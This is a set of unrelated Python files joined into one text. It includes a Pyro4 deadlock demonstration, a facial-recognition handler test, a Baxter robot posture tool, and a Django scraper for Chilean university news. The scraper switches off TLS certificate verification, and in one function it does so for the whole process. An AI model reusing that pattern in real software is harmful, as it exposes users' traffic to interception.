pkg_key = pkg.get_update_ignore_key()
if pkg_key in ignored_keys:
ignored_keys.remove(pkg_key)
self._write_ignored_updates(ignored_keys)
pkg.updates_ignored = False
|
client.py | from __future__ import print_function
import threading
import Pyro4
import bouncer
abort = False
def PyroLoop(daemon):
daemon.requestLoop()
def main():
global abort
daemon = Pyro4.Daemon()
server = Pyro4.Proxy("PYRONAME:example.deadlock")
bounceObj = bouncer.Bouncer("Client")
daemon.register(bounceObj) # callback object
# register callback on the server
server.register(bounceObj)
# Now register server as 'callback' on the bounce object in this client
# note: we're using the same proxy here as the main program!
# This is the main cause of the deadlock, because this proxy will already
# be engaged in a call when the callback object here wants to use it as well.
# One solution could be to use a new proxy from inside the callback object, like this:
# server2 = server.__copy__()
# bounceObj.register(server2)
bounceObj.register(server)
# create a thread that handles callback requests
thread = threading.Thread(target=PyroLoop, args=(daemon,))
thread.setDaemon(True)
thread.start()
print("This bounce example will deadlock!")
print("Read the source or Readme.txt for more info why this is the case!")
print("Calling server...")
result = server.process(["hello"])
print("Result=", result) # <--- you will never see this, it will deadlock in the previous call
if __name__ == '__main__':
main()
|
test_facial_recognition_handler.py | """utest channel handler module"""
# -*- coding: UTF-8 -*-
#
# =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
import os
import sys
import time
import threading
import unittest
from unittest.mock import patch
path = os.path.dirname(__file__)
index = path.rfind("ascenddk")
workspace = path[0: index]
path = os.path.join(workspace, "ascenddk/common/presenter/server/")
sys.path.append(path)
from common.channel_manager import ChannelManager
import facial_recognition.src.facial_recognition_handler as facial_recognition_handler
from facial_recognition.src.facial_recognition_handler import FacialRecognitionHandler
import common.channel_handler as channel_handler
def mock_wait(a):
time.sleep(0.1)
return True
class TestFacialRecognitionHandler(unittest.TestCase):
"""TestFacialRecognitionHandler"""
channel_name = "facial_recognition"
media_type = "video"
channel_manager = ChannelManager()
handler = None
def func_end(self):
self.handler.close_thread_switch = True
channel_name = TestFacialRecognitionHandler.channel_name
TestFacialRecognitionHandler.channel_manager.unregister_one_channel(channel_name)
def func_begin(self):
channel_name = TestFacialRecognitionHandler.channel_name
media_type = TestFacialRecognitionHandler.media_type
TestFacialRecognitionHandler.channel_manager.register_one_channel(channel_name)
self.handler = FacialRecognitionHandler(channel_name, media_type)
@classmethod
def tearDownClass(cls):
pass
@classmethod
def setUpClass(cls):
pass
def run_thread(self, func):
thread = threading.Thread(target=func)
thread.start()
def set_img_data(self):
time.sleep(0.5)
self.handler.img_data = b'1234'
def set_img_data_none(self):
time.sleep(1.5)
self.handler.img_data = None
@patch('threading.Event.clear', return_value = True)
@patch('threading.Event.wait', return_value = True)
def test_save_frame1(self, mock1, mock2):
self.func_begin()
image = b'1234'
face_list = []
self.handler.img_data = b'12'
self.handler.save_frame(image, face_list)
self.func_end()
def test_save_frame2(self):
self.func_begin()
image = b'1234'
face_list = []
self.handler.img_data = b'12'
self.run_thread(self.set_img_data_none)
self.handler.save_frame(image, face_list)
self.func_end()
@patch('threading.Event.clear', return_value = True)
@patch('threading.Event.wait', return_value = True)
def test_frames(self, mock1, mock2):
self.func_begin()
self.handler.close_thread_switch = True
time.sleep(0.5) # wait thread exit
self.handler.img_data = None
backup_heartbeat = facial_recognition_handler.HEARTBEAT_TIMEOUT
facial_recognition_handler.HEARTBEAT_TIMEOUT = 0
self.handler.close_thread_switch = False
for frame in self.handler.frames():
self.assertEqual(frame, None)
break
facial_recognition_handler.HEARTBEAT_TIMEOUT = backup_heartbeat
self.func_end()
@patch('threading.Event.clear', return_value = True)
@patch('threading.Event.wait')
def test_get_frame(self, mock1, mock2):
self.func_begin()
self.handler.frame_data = b'123'
self.handler.face_list = []
self.handler.fps = 5
mock1.return_value = True
ret = self.handler.get_frame()
self.assertNotEqual(ret, {})
mock1.return_value = False
ret = self.handler.get_frame()
self.assertEqual(ret, {})
mock1.return_value = True
self.func_end()
if __name__ == '__main__':
# unittest.main()
suite = unittest.TestSuite()
suite.addTest(TestFacialRecognitionHandler("test_frames"))
runner = unittest.TextTestRunner()
runner.run(suite) |
set_posture.py | #!/usr/bin/env python
"""
Tool that use to set Baxter into different modes
"""
import os
import rospy
import argparse
import baxter_interface
import yaml
from ik_solver import solve_IK
import threading
import alloy.ros
def move_arm_to_pose(limb_name, pose):
#create the baxter interface
limb_interface = baxter_interface.Limb(limb_name)
#do IK to solve the position
joint_position = solve_IK(limb_name, pose)
#zip the name and positions
joint_position = dict(zip(joint_position.name, joint_position.position))
#move the limb to the position
limb_interface.move_to_joint_positions(joint_position)
def move_to_posture(posture_name,record_path="posture_records.yaml", block=True, done_cb=None):
#rospy.init_node("bax_set_posture")
left_limb = baxter_interface.Limb('left')
right_limb = baxter_interface.Limb('right')
#resolve path
record_path = alloy.ros.resolve_res_path(record_path,"tbd_baxter_tools")
if record_path:
with open(record_path,'r') as f:
posture_list = yaml.load(f)
joint_angles = posture_list[posture_name]
if 'left' in joint_angles and 'right' in joint_angles:
lt = threading.Thread(target=left_limb.move_to_joint_positions, args=(joint_angles['left'],))
rt = threading.Thread(target=right_limb.move_to_joint_positions, args=(joint_angles['right'],))
lt.start()
rt.start()
lt.join()
rt.join()
elif 'left' in joint_angles:
left_limb.move_to_joint_positions(joint_angles['left'])
elif 'right' in joint_angles:
right_limb.move_to_joint_positions(joint_angles['right'])
def save_posture(posture_name, button_control=True, arm=None, record_path="posture_records.yaml"):
if button_control:
left_nav = baxter_interface.Navigator('left')
right_nav = baxter_interface.Navigator('right')
while not left_nav.button0 and not right_nav.button0:
rospy.sleep(0.1)
#save the position
left_joint_angles = baxter_interface.Limb('left').joint_angles()
right_joint_angles = baxter_interface.Limb('right').joint_angles()
posture_list = dict()
#resolve path
record_path = alloy.ros.resolve_res_path(record_path,"tbd_baxter_tools")
#create the file at the root of `tbd_baxter_tools\res` if doesn't exist
if record_path is None:
record_path = os.path.join(alloy.ros.create_res_dir("tbd_baxter_tools"),"posture_records.yaml")
#save them to some type of files
if not os.path.exists(record_path):
yaml.dump(posture_list,file(record_path,'w'))
with open(record_path,'rw') as f:
posture_list = yaml.load(f)
if arm == 'right':
posture_list[posture_name] = {
'right': right_joint_angles
}
elif arm == 'left':
posture_list[posture_name] = {
'left': left_joint_angles,
}
else:
posture_list[posture_name] = {
'left': left_joint_angles,
'right': right_joint_angles
}
yaml.dump(posture_list, file(record_path,'w')) |
views.py | from django.shortcuts import render
from news.models import Universidad, Noticia
from bs4 import BeautifulSoup
from django.conf import settings
import feedparser, unicodedata, urllib.request, time, re, datetime, time, threading
import ssl
import dateutil.parser
import logging
import unidecode
result = []
# Create your views here.
def scraper(request):
hora = {}
hora["start"] = time.strftime("%H:%M:%S")
hora_inicio = time.time()
if settings.DEBUG == False:
# Usar hilos para Producción
logging.basicConfig( level=logging.DEBUG, format='[%(levelname)s] - %(threadName)-10s : %(message)s')
universidades = [
{'target':pucv, 'name':'PUCV'},
{'target':ucn, 'name':'UCN'},
{'target':utfsm, 'name':'UTFSM'},
{'target':uv, 'name':'UV'},
{'target':upla, 'name':'UPLA'},
{'target':udec, 'name':'UDEC'},
{'target':utalca, 'name':'UTALCA'},
{'target':ulagos, 'name':'ULAGOS'},
{'target':unap, 'name':'UNAP'},
{'target':ua, 'name':'UA'},
{'target':uda, 'name':'UDA'},
{'target':userena, 'name':'USERENA'},
{'target':uoh, 'name':'UOH'},
{'target':ucm, 'name':'UCM'},
{'target':ubiobio, 'name':'UBIOBIO'},
{'target':ucsc, 'name':'UCSC'},
{'target':ufro, 'name':'UFRO'},
{'target':uct, 'name':'UCT'},
{'target':uach, 'name':'UACH'},
{'target':uaysen, 'name':'UAYSEN'},
{'target':umag, 'name':'UMAG'},
{'target':uta, 'name':'UTA'}
]
# Por cada universidad crea un hilo de ejecución
for universidad in universidades:
threading.Thread(target=universidad['target'], name=universidad['name']).start()
else:
# Este metodo de ejecutar los scraper es muy lento
# Pero el panel uninews.datoslab.cl/scraper solo muestra información acerca de los errores e información si se usa este metodo
# Usar solo para Desarrollo
#pucv() # Funcionando
#ucn() # Funcionando
#utfsm() # Funcionando
#uv() # Funcionando
#upla() # Funcionando #Revisar
#udec() # Funcionando
#utalca() # Funcionando #Revisar
#ulagos() # Funcionando
#ucsc() # Funcionando
#ubiobio() # Funcionando
#uda() # En Funcionando
#userena() # En Funcionando #Revisar
# unap() # Funcionando
#ua() # Funcionando
# uoh() No se pudo scrapear
# ucm() # Funcionando
# ufro() # Funcionando
# uct() # Funciona con angular, usar selenium
# uach()
# uaysen()
umag() # Funcionando - Revisar la bajada
# uta() # Funcionando
hora_fin = time.time()
hora["finish"] = time.strftime("%H:%M:%S")
hora["total"] = hora_fin - hora_inicio
result.append({'status':"", 'error_message':'', 'universidad':'', 'titulo':'', 'bajada':'', 'fecha':'', 'link_noticia':'', 'link_recurso':'', 'categoria':''})
return render(request, "scraper/scraper.html", {'result':result, 'hora':hora})
def saveNew(new):
try:
# Busca la noticia en la base de datos
# Si no la encuentra genera un error y ejecuta el except
n = Noticia.objects.get(titulo=new['titulo'], id_universidad__alias = new['universidad'].alias)
print(new['universidad'].alias + ": " + new['titulo'] + " | Existe")
e = "Existe"
# Si la encuentra agrega un mensaje que se mostrará al de depuración
result.append({'status':"exist", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
except Noticia.DoesNotExist as e:
# Si la noticia no se encuentra la crea
n = Noticia(
titulo=new['titulo'],
titulo_busqueda=formatear_busqueda(new['titulo']),
bajada=new['bajada'],
bajada_busqueda=formatear_busqueda(new['bajada']),
fecha=new['fecha'],
link_noticia=new['link_noticia'],
link_recurso=new['link_recurso'],
id_universidad=new['universidad'],
categoria=new['categoria'],
contador_visitas=0
)
n.save() # Guarda la noticia en la base de datos
print(new['universidad'].alias + ": " + new['titulo'] + " | Insertada")
e = "Insertada"
result.append({'status':"ok", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
def formatear_busqueda(text):
# Al cambiar algo tambien debe ser modificado en search_fix de views de news
text = unidecode.unidecode(text).lower()
text = text.replace('"', "")
text = text.replace('?', "")
text = text.replace('¿', "")
text = text.replace(':', "")
text = text.replace('#', "")
text = text.replace('.', "")
text = text.replace(',', "")
text = text.replace(';', "")
text = text.replace('(', "")
text = text.replace(')', "")
return text
def formatear_fecha(fecha, universidad):
if universidad == "uv":
fecha = fecha.split()
dia = fecha[0]
mes = fecha[2].lower()
anno = fecha[4]
elif universidad == "upla":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "ufsm":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "ucn":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == "pucv":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[3].lower()
anno = fecha[5]
elif universidad == "udec":
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == "utalca":
fecha = fecha.lower().split()
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == "ulagos":
fecha = fecha.lower().split('/')
dia = fecha[0]
mes = fecha[1]
anno = fecha[2]
elif universidad == "ucsc":
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == "ubiobio":
fecha = fecha.split()
dia = fecha[1]
mes = fecha[2].lower()
anno = fecha[3]
elif universidad == 'uda':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'userena':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'unap':
fecha = fecha.lower().split()
dia = fecha[1]
mes = fecha[3]
anno = fecha[5]
elif universidad == 'ua':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'ucm':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'ufro':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'uta':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
elif universidad == 'umag':
dia = dateutil.parser.parse(fecha).strftime('%d')
mes = dateutil.parser.parse(fecha).strftime('%m')
anno = dateutil.parser.parse(fecha).strftime('%Y')
if mes == "enero" or mes == "jan" or mes == '1':
mes = '01'
elif mes == "febrero" or mes == "feb" or mes == '2':
mes = '02'
elif mes == "marzo" or mes == "mar" or mes == '3':
mes = '03'
elif mes == "abril" or mes == "apr" or mes == '4':
mes = '04'
elif mes == "mayo" or mes == "may" or mes == '5':
mes = '05'
elif mes == "junio" or mes == "jun" or mes == '6':
mes = '06'
elif mes == "julio" or mes == "jul" or mes == '7':
mes = '07'
elif mes == "agosto" or mes == "aug" or mes == '8':
mes = '08'
elif mes == "septiembre" or mes == "sep" or mes == '9':
mes = '09'
elif mes == "octubre" or mes == "oct" or mes == '10':
mes = '10'
elif mes == "noviembre" or mes == "nov" or mes == '11':
mes = '11'
elif mes == "diciembre" or mes == "dec" or mes == '12':
mes = '12'
if dia == "1":
dia = '01'
elif dia == "2":
dia = '02'
elif dia == "3" :
dia = '03'
elif dia == "4":
dia = '04'
elif dia == "5":
dia = '05'
elif dia == "6":
dia = '06'
elif dia == "7":
dia = '07'
elif dia == "8":
dia = '08'
elif dia == "9":
dia = '09'
#fecha = dia + "/" + mes + "/" + anno
fecha = anno + "-" + mes + "-" + dia
return fecha
# Realiza limpieza a cada categoria
def setCategoria(categoria = ''):
if categoria == '' or categoria == None:
return 'sin-categoria'
else:
categoria = categoria.lower()
categoria = elimina_tildes(categoria)
categoria = categoria.replace(" ", "-")
categoria = categoria.replace("&", "y")
return categoria
def elimina_tildes(s):
return ''.join((c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn'))
# Universidad de Playa Ancha
def upla():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UPLA')
url_rss = "https://www.upla.cl/noticias/feed/" # URL de feed RSS
feed = feedparser.parse( url_rss ) # Se obtiene el XML y se procesa
for item in feed['items']:
try:
titulo = item['title']
bajada = item['summary']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "upla")
# Se obtiene y filtra la categoria para ser buscada
categoria_busqueda = setCategoria(item['category'])
if categoria_busqueda == 'gestion-institucional':
categoria_busqueda = 'gestion'
# Entra en la pagina de cada categoria y busca todas las noticias
contents = urllib.request.urlopen("https://www.upla.cl/noticias/category/"+categoria_busqueda).read()
bs = BeautifulSoup(contents, "html.parser")
# Se realizan ajustes para las catergorias con alguna particularidad
if categoria_busqueda == 'coronavirus':
articles = bs.find_all("div", ["timeline-content"])
else:
articles = bs.find_all("article", ["item-list"])
# Por cada noticia de cada categoria obtiene su titulo
for article in articles:
if categoria_busqueda == 'coronavirus':
titulo_articulo = article.h2.a.text
else:
titulo_articulo = article.find("a").text
# Si el titulo de la noticia es igual al titulo obtenido del XML, obtiene la imagen de esa noticia y termina el ciclo
if titulo_articulo == titulo:
imagen = article.find("img")['src']
break
else:
imagen = ''
# Se ejecuta la función para guardar la noticia en la base de datos
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
# Si ocurre un error se individualiza y se prepara para mostrar
# en la pantalla de depuración
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Pontificia Universidad Católica de Valparaíso
def pucv():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='PUCV')
nombre_uni = "pucv"
context = ssl._create_unverified_context()
contents = urllib.request.urlopen("https://www.pucv.cl/pucv/site/tax/port/all/taxport_1___1.html", context=context).read()
bs = BeautifulSoup(contents, "html.parser")
articulos = bs.find_all("article")
for articulo in articulos:
try:
link = articulo.a['href']
link = "https://www.pucv.cl" + link.replace("..", "")
fecha = articulo.find("span",{"class":"fecha aright"})
imagen = articulo.img['src']
imagen = "https://pucv.cl" + imagen.replace("..","")
pagina_noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
titulo = bs_noticia.find("h1", { "class" : "titular" }).text
if fecha is None:
fecha = time.strftime("%Y-%m-%d")
else:
fecha = formatear_fecha(fecha.text,nombre_uni)
try:
bajada = bs_noticia.find("p",{ "class" : "bajada" }).text
except Exception as e:
bajada = ''
result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
# No encuentra una categoría
try:
newpage = urllib.request.urlopen(link).read()
bs_cate = BeautifulSoup(newpage, "html.parser")
categoria = bs_cate.find("div",{ "class" : "breadcrumbs" })
categorias = categoria.findAll("a")
category = categorias[2].text
categoria_busqueda = setCategoria(category)
except Exception as e:
categoria_busqueda = 'sin-categoria'
result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
saveNew({'status':"ok", 'error_message':'', 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Católica del Norte
def ucn():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCN')
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
d = feedparser.parse("https://www.noticias.ucn.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
nombre_uni = "ucn"
link = (e.link)
categoria_busqueda = setCategoria((e.category))
fecha = e.published
fecha = formatear_fecha(fecha,nombre_uni)
description = e.description.split("/>")
bajada = description[1]
cuerpo = e['content']
contenido = cuerpo[0].value
imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url").replace("-150x150", "")
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
#Universidad Técnico Federico Santa María
def utfsm():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTFSM')
d = feedparser.parse("https://noticias.usm.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
nombre_uni = "ufsm"
link = (e.link)
categoria_busqueda = setCategoria((e.category))
bajada = (e.description).replace("[…]", "").strip()
fecha = e.published
fecha = formatear_fecha(fecha,nombre_uni)
cuerpo = e['content']
contenido = cuerpo[0].value
try:
imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
except:
imagen = ''
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Valparaíso
def uv():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UV')
contents = urllib.request.urlopen("https://www.uv.cl/pdn/archivo/").read()
bs = BeautifulSoup(contents, "html.parser")
divs = bs.find_all("div", ["item n_caja borde6", "item n_caja borde6 fin"])
for div in divs:
try:
fecha = div.find("div", ["fecha"]).text
fecha = formatear_fecha(fecha, "uv")
link = div.a['href']
link = "https://www.uv.cl/pdn" + link.replace("..", "")
# Accede a la pagina de la noticia
pagina_noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
titulo = bs_noticia.find("div", id="n_titulo").text
bajada = bs_noticia.find("div", id="n_bajada").text
try:
imagen = bs_noticia.find("div", id="n_clipex").img['src']
imagen = "https://www.uv.cl" + imagen
except TypeError:
imagen = div.find("img", ["sombra"])['src']
imagen = "https://www.uv.cl/pdn" + imagen.replace("..", "")
categoria_busqueda = setCategoria()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Concepción
def udec():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UDEC')
url_rss = "https://noticias.udec.cl/feed/"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text.strip()
fecha = item['published']
fecha = formatear_fecha(fecha, "udec")
categoria_busqueda = setCategoria(item['category'])
imagen = BeautifulSoup(urllib.request.urlopen(link).read(), "html.parser").find_all('img', {'class': 'attachment-large size-large'})[1]['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Talca
def utalca():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTALCA')
contents = urllib.request.urlopen("https://www.utalca.cl/noticias/").read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find('div', {'class': 'section-news'})
items = items.find_all("div", {"class": "card-news"})
items = list(set(items)) # Elimina elementos duplicados
for item in items:
try:
link = item.a['href']
titulo = item.find("h5").text
if item.div.p is None:
categoria_busqueda = setCategoria()
else:
categoria_busqueda = setCategoria(item.div.p.text)
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class": "interior-body"}).h6.text
fecha = bs_noticia.find("div", {"class": "interior-body"}).span.text
fecha = formatear_fecha(fecha, 'utalca')
imagen = bs_noticia.find("img", {"class": "attachment-post-thumbnail size-post-thumbnail wp-post-image"})['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Los Lagos
def ulagos():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='ULAGOS')
items = []
categorias = ['campus-osorno', 'campus-pto-montt', 'sede-santiago', 'sede-chiloe']
for categoria in categorias:
contents = urllib.request.urlopen("https://www.ulagos.cl/category/" + categoria + "/").read()
bs = BeautifulSoup(contents, "html.parser")
items.extend(bs.find_all("div", {"class": "ultimas-noticias"}))
for item in items:
try:
link = item.a['href']
titulo = item.find("div", {"class": "overflow_titulo_noticias"}).text.strip()
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class":"title-post"}).span.text.strip()
categoria_busqueda = bs_noticia.find("div", {"class":"category-post"}).a.text.lower().strip()
categoria_busqueda = setCategoria(categoria_busqueda)
fecha = bs_noticia.find("div", {"class":"conten-post-date"}).text.strip()
fecha = formatear_fecha(fecha, "ulagos")
if bs_noticia.find("img", {"class": "img-destacado"}) is None:
imagen = ''
else:
imagen = bs_noticia.find("img", {"class": "img-destacado"})["src"]
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Católica de la Santísima Concepción
def ucsc():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCSC')
contents = urllib.request.urlopen("https://www.ucsc.cl/noticias/").read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("article", {"class": "hentry-news"})
items = list(set(items)) # Elimina elementos duplicados
for item in items:
try:
link = item.header.h2.a['href']
titulo = item.header.h2.a.text
fecha = item.header.p.time['datetime']
fecha = formatear_fecha(fecha, 'ucsc')
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class": "entry-summary"}).p.text
try:
imagen = bs_noticia.find("article", {"class": "hentry hentry-news"}).header.span.img['src']
except Exception as e:
imagen = ''
categoria_busqueda = bs_noticia.find("a", {"rel": "category tag"})
categoria_busqueda = setCategoria(categoria_busqueda.text)
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad del Bío-Bío
def ubiobio():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UBIOBIO')
d = feedparser.parse("http://noticias.ubiobio.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
link = (e.link)
categoria_busqueda = setCategoria(e.category)
bajada = (e.description).replace("[…]", "")
bs_bajada = BeautifulSoup(bajada, "html.parser")
bajada = bs_bajada.find("p").text
fecha = e.published
fecha = formatear_fecha(fecha,'ubiobio')
cuerpo = e['content']
contenido = cuerpo[0].value
imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Arturo Prat
def unap():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UNAP')
url_base = 'https://www.unap.cl'
urls_news = {
'investigacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_13_48__1.html',
